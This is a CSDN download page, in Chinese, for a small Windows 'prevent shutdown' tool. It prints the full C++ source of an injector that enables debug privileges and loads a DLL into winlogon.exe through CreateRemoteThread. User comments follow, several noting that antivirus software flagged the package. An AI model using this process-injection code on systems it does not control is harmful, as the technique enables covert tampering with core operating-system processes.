禁止关机小程序VC_c++阻止关机资源-CSDN文库

共8个文件

dsp：1个

dsw：1个

exe：1个

4星 · 超过85%的资源需积分: 48 135 浏览量 2008-11-22 13:01:30 上传评论 5 收藏 38KB RAR 举报

资源推荐

资源详情

资源评论

收起资源包目录

InjDLL(NoShut).rar （8个子文件）

InjDLL.dsw 520B

Release

NoShut.dll 44KB

InjDLL.exe 48KB

Script1.rc 3KB

MainIcon.ico 4KB

resource.h 501B

Main.cpp 3KB

InjDLL.dsp 4KB

#define EXENAME "winlogon.exe" #define DLLNAME "C:\\NoShutDLL.dll" //作者Flyue qq: 406088125 转载时请注明 #include <windows.h> #include <stdio.h> #include <TLHELP32.H> DWORD ProcessNameToPId(LPCTSTR lpszProcess); BOOL UpPrivilege(HANDLE hprocess, LPCTSTR lpname); BOOL UpPrivilege(HANDLE hprocess, LPCTSTR lpname) //提升进程权限 debug { HANDLE hToken; TOKEN_PRIVILEGES Privileges; LUID luid; OpenProcessToken(hprocess, TOKEN_ADJUST_PRIVILEGES, &hToken); Privileges.PrivilegeCount = 1; LookupPrivilegeValue(NULL, lpname, &luid); Privileges.Privileges[0].Luid = luid; Privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if(AdjustTokenPrivileges(hToken, FALSE, &Privileges, NULL, NULL, NULL)!=0) return TRUE; return FALSE; } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { CopyFile("NoShut.dll", DLLNAME, FALSE); char privilege[] = SE_DEBUG_NAME; HANDLE hprocess; hprocess = GetCurrentProcess(); if(!UpPrivilege(hprocess, privilege)) //开始提权 { MessageBox(0, "UpPrivilege Error!", 0, MB_OK | MB_ICONERROR); return 1; } char File_Name[MAX_PATH] = {0}; sprintf(File_Name, "%s", EXENAME); DWORD ProcessPid = ProcessNameToPId(File_Name); //从进程名字获取进程PID if(ProcessPid == 0) { MessageBox(0, "Not Find This File", 0, MB_OK | MB_ICONERROR); return 1; } HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessPid); DWORD dwSize; char DllName[MAX_PATH]; sprintf(DllName, "%s", DLLNAME); dwSize = strlen(DllName); LPVOID lpBuf = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE); if(lpBuf == NULL) { MessageBox(0, "VirtualAllocEx Error", 0, MB_OK | MB_ICONERROR); CloseHandle(hProcess); return 1; } if(!WriteProcessMemory(hProcess, lpBuf, DllName, dwSize, NULL)) { MessageBox(0, "WriteProcessMemory Error", 0, MB_OK | MB_ICONERROR); CloseHandle(hProcess); return 1; } LPVOID pFunc = LoadLibraryA; HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunc, lpBuf, 0, NULL); MessageBox(0, "Success!", "OK", MB_OK | MB_ICONINFORMATION); return 0; } DWORD ProcessNameToPId(LPCTSTR lpszProcess) { HANDLE tlhelp = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 pe32; pe32.dwSize = sizeof(PROCESSENTRY32); if(!Process32First(tlhelp, &pe32)) return 0; while(Process32Next(tlhelp, &pe32)) { if(!strcmp(pe32.szExeFile, lpszProcess)) { return pe32.th32ProcessID; break; } } return 0; }

评论收藏

内容反馈

whut2006

2012-11-04

刚一下下来，就被瑞星检测到问题。还是寻找其他的方法吧。同样感谢您分享资料。
whmtorrent

2016-03-11

vb写的，而且好像是用dll阻止的，不符合我要求
fly_fly20

2015-11-26

还行，只不过还要修改注册表，把快速关机关掉
may

2012-08-17

被金山杀掉了，没下载下来，看文件名，应该是注入进程挂钩函数吧，因为我不想使用注入，所以放弃下载了，不过还是要谢谢作者，我已经用窗体获取系统消息的方法解决了问题
零凌灵

2015-06-11

没什么用用不了